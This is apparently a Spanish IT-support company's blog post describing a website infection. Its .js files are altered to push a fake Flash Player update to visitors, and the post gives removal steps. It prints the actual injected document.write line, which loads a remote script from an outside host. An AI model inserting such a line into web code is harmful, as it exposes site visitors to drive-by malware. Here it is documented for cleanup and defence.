Nuevo virus gwykzxc2

Mantenimiento informático de calidad Horas ilimitadas Visitas mensuales Sin permanencia Siempre el mismo técnico Puesta a punto inicial

Nuevo virus gwykzxc2

En los últimos días hemos venido recibiendo varias llamadas de clientes sobre un tipo de virus que llamaremos gwykzxc2, este virus se instala en la web, para que todos los que la visiten reciban un mensaje donde les obliga a descargar un virus, con el engaño de ser una actualización de software

Funcionamiento

Cuando se visualiza una pagina, aparece una ventana donde nos obliga a descargar, en este caso una supuesta actualización de Flash Player, que evidentemente es un virus, este si lo detecta el antivirus, aunque es de suponer que esta descarga pueda ir variando.

El problema es que esta ventana ademas de incorporar un virus, no permite que se pueda navegar por la web, lo que la hace inservible, y puede que sea incorporada dentro de las listas negras de google como una pagina que distribuye virus.

Como lo hacen

Las alteraciones en el funcionamiento se producen porque se alteran los ficheros tipo .js (scripts en java), añadiendo una linea como la siguiente

document.write('<script type="text/javascript" src="http://surel.com.tr/pict/gwykzxc2.php?id=110255231"></script>');

Esta linea simplemente carga una script mas amplio que se encarga de mostrar la siguiente ventana

virus web

Solución:

Abrir todos los ficheros .js y eliminar la linea comentada arriba, generalmente es la última linea del fichero.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

A %d blogueros les gusta esto: